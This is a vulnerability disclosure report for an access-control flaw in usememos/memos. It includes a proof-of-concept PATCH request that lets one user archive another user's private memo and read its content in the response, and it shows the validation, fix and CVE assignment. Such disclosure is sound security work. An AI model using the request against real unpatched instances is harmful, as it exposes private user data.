View any content private memos from other users in usememos/memos

Valid

Reported on

Dec 23rd 2022

Description

User can view any content from private private memos from other users via api

PATCH /api/memo/8 HTTP/1.1

{"id":8,"rowStatus":"ARCHIVED"}

Proof of Concept

Login to website in brower 1 with user A. Login to website in brower 2 with user B. Example: User B have private nemo with id 8.

With session in brower 1 with user A make a request

PATCH /api/memo/8 HTTP/1.1

{"id":8,"rowStatus":"ARCHIVED"}

After user A get a response

{"data":{"id":8,"rowStatus":"ARCHIVED","creatorId":1,"createdTs":1671805207,"updatedTs":1671805219,"content":"demo content","visibility":"PRIVATE","pinned":false,"displayTs":1671805207,"creator":{"id":1,"rowStatus":"NORMAL","createdTs":1671803462,"updatedTs":1671803845,"username":"userB","role":"HOST","email":"","nickname":"userB","openId":"","userSettingList":null},"resourceList":[]}}

The content of nemo appears in the returned response "content":"demo content"

Demo video: https://drive.google.com/file/d/1FYpaZlktndUk9fmoCy8q7PAPMOARBOE1/view

Impact

Anyone can read other people memos.

We are processing your report and will contact the usememos/memos team within 24 hours. a year ago
A GitHub Issue asking the maintainers to create a SECURITY.md exists a year ago
Kevin Kien modified the report
a year ago
Kevin Kien modified the report
a year ago
We have contacted a member of the usememos/memos team and are waiting to hear back a year ago
STEVEN validated this vulnerability a year ago
Kevin Kien has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Kevin Kien
a year ago

Researcher

Can I get a CVE for this bug

STEVEN marked this as fixed in 0.9.1 with commit 3556ae a year ago
STEVEN has been awarded the fix bounty
This vulnerability has been assigned a CVE
STEVEN published this vulnerability a year ago
to join this conversation